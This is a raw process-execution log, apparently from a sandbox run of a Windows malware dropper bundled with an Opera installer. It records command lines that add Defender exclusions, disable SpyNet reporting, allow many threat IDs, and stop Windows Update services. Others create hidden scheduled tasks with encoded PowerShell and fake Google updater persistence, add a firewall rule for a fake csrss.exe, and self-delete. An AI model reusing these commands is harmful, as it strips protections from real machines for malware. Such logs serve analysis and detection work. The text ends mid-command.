C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f0,0x6ed874f0,0x6ed87500,0x6ed8750c
C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
"C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe"
C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
"C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4148 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121225253" --session-guid=79dc5c52-c873-4ed6-b970-4ec9914ceb6f --server-tracking-blob=ZDJlOTI2ZmU5ZWVkNDMzNGE5NGY5YzIxNjc1NDcwZjg0NWMzNDk2NmJkNDEzNmRlMTlkZGYzYmY1MDUwODAzZTp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDYwNzE2Mi41NTQwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmMTY0ZGRmMC1iOWRiLTRkOGUtYTYzOS04ZTMxMTBiNzBhNDgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddc74f0,0x6ddc7500,0x6ddc750c
C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
.\Install.exe /IuCdidQXCBm "385118" /S
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwusntZYb" /SC once /ST 11:05:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwusntZYb"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --version
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xb21588,0xb21598,0xb215a4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwusntZYb"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe\" rd /xzsite_idBSG 385118 /S" /V1 /F
C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3468 -ip 3468
C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2176
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe rd /xzsite_idBSG 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3696 -ip 3696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2104
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 